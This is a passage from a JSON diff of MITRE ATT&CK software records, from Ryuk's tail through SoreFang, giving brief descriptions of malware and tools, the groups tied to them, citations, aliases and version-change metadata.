Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Ryuk" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Brenton, Zurich Insurance Group", + "The DFIR Report" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 22:21:23.589000+00:00\", \"old_value\": \"2025-04-16 20:38:27.373000+00:00\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][1]\": \"The DFIR Report\"}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][0]\": \"The DFIR Report, @TheDFIRReport\"}}", + "previous_version": "1.4" + }, + { + "type": "tool", + "id": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:45:30.257000+00:00", + "name": "SDelete", + "description": "[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0195", + "external_id": "S0195" + }, + { + "source_name": "SDelete", + "description": "(Citation: Microsoft SDelete July 2016)" + }, + { + "source_name": "Microsoft SDelete July 2016", + "description": "Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.", + "url": "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SDelete" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:30.257000+00:00\", \"old_value\": \"2025-04-16 20:38:56.799000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--0998045d-f96e-4284-95ce-3c8219707486", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:37.580000+00:00", + "name": "SEASHARPEE", + "description": "[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0185", + "external_id": "S0185" + }, + { + "source_name": "SEASHARPEE", + "description": "(Citation: FireEye APT34 Webinar Dec 2017)" + }, + { + "source_name": "FireEye APT34 Webinar Dec 2017", + "description": "Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.", + "url": "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SEASHARPEE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:37.580000+00:00\", \"old_value\": \"2025-04-16 20:37:54.263000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--58adaaa8-f1e8-4606-9a08-422e568461eb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:42.754000+00:00", + "modified": "2025-04-25 14:43:25.821000+00:00", + "name": "SHOTPUT", + "description": "[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0063", + "external_id": "S0063" + }, + { + "source_name": "Backdoor.APT.CookieCutter", + "description": "(Citation: FireEye Clandestine Fox Part 2)" + }, + { + "source_name": "Pirpi", + "description": "(Citation: FireEye Clandestine Fox Part 2)" + }, + { + "source_name": "FireEye Clandestine Wolf", + "description": "Eng, E., Caselden, D.. (2015, June 23). Operation Clandestine Wolf \u2013 Adobe Flash Zero-Day in APT3 Phishing Campaign. Retrieved January 14, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html" + }, + { + "source_name": "FireEye Clandestine Fox Part 2", + "description": "Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SHOTPUT", + "Backdoor.APT.CookieCutter", + "Pirpi" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:25.821000+00:00\", \"old_value\": \"2025-04-16 20:38:09.918000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--1244e058-fa10-48cb-b484-0bcf671107ae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-03-23 19:34:30.486000+00:00", + "modified": "2025-04-30 13:26:45.728000+00:00", + "name": "SILENTTRINITY", + "description": "[SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0692", + "external_id": "S0692" + }, + { + "source_name": "SILENTTRINITY", + "description": "(Citation: GitHub SILENTTRINITY March 2022)" + }, + { + "source_name": "Security Affairs SILENTTRINITY July 2019", + "description": "Paganini, P. (2019, July 7). Croatia government agencies targeted with news SilentTrinity malware. Retrieved March 23, 2022.", + "url": "https://securityaffairs.co/wordpress/88021/apt/croatia-government-silenttrinity-malware.html" + }, + { + "source_name": "GitHub SILENTTRINITY March 2022", + "description": "Salvati, M (2019, August 6). SILENTTRINITY. Retrieved March 23, 2022.", + "url": "https://github.com/byt3bl33d3r/SILENTTRINITY" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SILENTTRINITY" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniel Acevedo, ARMADO" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-30 13:26:45.728000+00:00\", \"old_value\": \"2024-09-23 14:18:53.140000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Daniel Acevedo, ARMADO\", \"old_value\": \"Daniel Acevedo, Blackbot\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--3240cbe4-c550-443b-aa76-cc2a7058b870", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:42:59.423000+00:00", + "name": "SNUGRIDE", + "description": "[SNUGRIDE](https://attack.mitre.org/software/S0159) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045) as first stage malware. (Citation: FireEye APT10 April 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0159", + "external_id": "S0159" + }, + { + "source_name": "SNUGRIDE", + "description": "(Citation: FireEye APT10 April 2017)" + }, + { + "source_name": "FireEye APT10 April 2017", + "description": "FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SNUGRIDE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:59.423000+00:00\", \"old_value\": \"2025-04-16 20:38:01.282000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--9ca488bd-9587-48ef-b923-1743523e63b2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:44:12.545000+00:00", + "name": "SOUNDBITE", + "description": "[SOUNDBITE](https://attack.mitre.org/software/S0157) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0157", + "external_id": "S0157" + }, + { + "source_name": "SOUNDBITE", + "description": "(Citation: FireEye APT32 May 2017)" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SOUNDBITE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:12.545000+00:00\", \"old_value\": \"2025-04-16 20:38:26.524000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--67e6d66b-1b82-4699-b47a-e2efb6268d14", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:37.767000+00:00", + "modified": "2025-04-25 14:43:37.740000+00:00", + "name": "SeaDuke", + "description": "[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0053", + "external_id": "S0053" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SeaDuke", + "SeaDaddy", + "SeaDesk" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:37.740000+00:00\", \"old_value\": \"2025-04-16 20:38:13.890000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--f931a0b9-0361-4b1b-bacf-955062c35746", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-13 14:57:39.387000+00:00", + "modified": "2025-04-25 14:45:07.890000+00:00", + "name": "Seth-Locker", + "description": "[Seth-Locker](https://attack.mitre.org/software/S0639) is a ransomware with some remote control capabilities that has been in use since at least 2021.\n(Citation: Trend Micro Ransomware February 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0639", + "external_id": "S0639" + }, + { + "source_name": "Trend Micro Ransomware February 2021", + "description": "Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Seth-Locker" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:07.890000+00:00\", \"old_value\": \"2025-04-16 20:38:44.630000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0ba9281c-93fa-4b29-8e9e-7ef918c7b13a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-22 17:02:52.954000+00:00", + "modified": "2025-04-25 14:42:40.376000+00:00", + "name": "SharpStage", + "description": "[SharpStage](https://attack.mitre.org/software/S0546) is a .NET malware with backdoor capabilities.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0546", + "external_id": "S0546" + }, + { + "source_name": "SharpStage", + "description": "(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)" + }, + { + "source_name": "Cybereason Molerats Dec 2020", + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" + }, + { + "source_name": "BleepingComputer Molerats Dec 2020", + "description": "Ilascu, I. (2020, December 14). Hacking group\u2019s new malware abuses Google and Facebook services. Retrieved December 28, 2020.", + "url": "https://www.bleepingcomputer.com/news/security/hacking-group-s-new-malware-abuses-google-and-facebook-services/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SharpStage" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:40.376000+00:00\", \"old_value\": \"2025-04-16 20:37:55.445000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5763217a-05b6-4edd-9bca-057e47b5e403", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-12 21:28:20.934000+00:00", + "modified": "2025-04-25 14:43:24.555000+00:00", + "name": "ShimRat", + "description": "[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name \"[ShimRat](https://attack.mitre.org/software/S0444)\" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0444", + "external_id": "S0444" + }, + { + "source_name": "FOX-IT May 2016 Mofang", + "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.", + "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ShimRat" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:24.555000+00:00\", \"old_value\": \"2025-04-16 20:38:09.372000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--115f88dd-0618-4389-83cb-98d33ae81848", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-12 21:29:48.294000+00:00", + "modified": "2025-04-25 14:45:13.595000+00:00", + "name": "ShimRatReporter", + "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0445", + "external_id": "S0445" + }, + { + "source_name": "FOX-IT May 2016 Mofang", + "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.", + "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ShimRatReporter" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:13.595000+00:00\", \"old_value\": \"2025-04-16 20:38:50.090000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--df4cd566-ff2f-4d08-976d-8c86e95782de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-05-06 14:44:50.494000+00:00", + "modified": "2025-04-25 14:44:52.304000+00:00", + "name": "SideTwist", + "description": "[SideTwist](https://attack.mitre.org/software/S0610) is a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0610", + "external_id": "S0610" + }, + { + "source_name": "Check Point APT34 April 2021", + "description": "Check Point. (2021, April 8). Iran\u2019s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.", + "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SideTwist" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:52.304000+00:00\", \"old_value\": \"2025-04-16 20:38:38.737000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--4fbd565b-bf55-4ac7-80b4-b183a7b64b9c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-18 15:26:55.509000+00:00", + "modified": "2025-04-25 14:43:17.695000+00:00", + "name": "Siloscape", + "description": "[Siloscape](https://attack.mitre.org/software/S0623) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://attack.mitre.org/software/S0623) was first observed in March 2021.(Citation: Unit 42 Siloscape Jun 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0623", + "external_id": "S0623" + }, + { + "source_name": "Unit 42 Siloscape Jun 2021", + "description": "Prizmant, D. (2021, June 7). Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments. Retrieved June 9, 2021.", + "url": "https://unit42.paloaltonetworks.com/siloscape/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Siloscape" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniel Prizmant, Palo Alto Networks", + "Yuval Avrahami, Palo Alto Networks" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Containers" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:17.695000+00:00\", \"old_value\": \"2025-04-16 20:38:07.079000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e494ad79-37ee-4cd0-866b-299c521d8b94", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:56.967000+00:00", + "name": "Socksbot", + "description": "[Socksbot](https://attack.mitre.org/software/S0273) is a backdoor that abuses Socket Secure (SOCKS) proxies. (Citation: TrendMicro Patchwork Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0273", + "external_id": "S0273" + }, + { + "source_name": "Socksbot", + "description": "(Citation: TrendMicro Patchwork Dec 2017)" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Socksbot" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:56.967000+00:00\", \"old_value\": \"2025-04-16 20:38:40.498000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--94d6d788-07bb-4dcc-b62f-e02626b00108", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-21 15:52:14.624000+00:00", + "modified": "2025-04-25 14:44:05.856000+00:00", + "name": "SodaMaster", + "description": "[SodaMaster](https://attack.mitre.org/software/S0627) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0627", + "external_id": "S0627" + }, + { + "source_name": "DARKTOWN", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "dfls", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "DelfsCake", + "description": "(Citation: Securelist APT10 March 2021)" + }, + { + "source_name": "Securelist APT10 March 2021", + "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.", + "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SodaMaster", + "DARKTOWN", + "dfls", + "DelfsCake" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:05.856000+00:00\", \"old_value\": \"2025-04-16 20:38:24.073000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-29 19:33:35.122000+00:00", + "modified": "2025-04-25 14:44:55.728000+00:00", + "name": "SoreFang", + "description": "[SoreFang](https://attack.mitre.org/software/S0516) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC 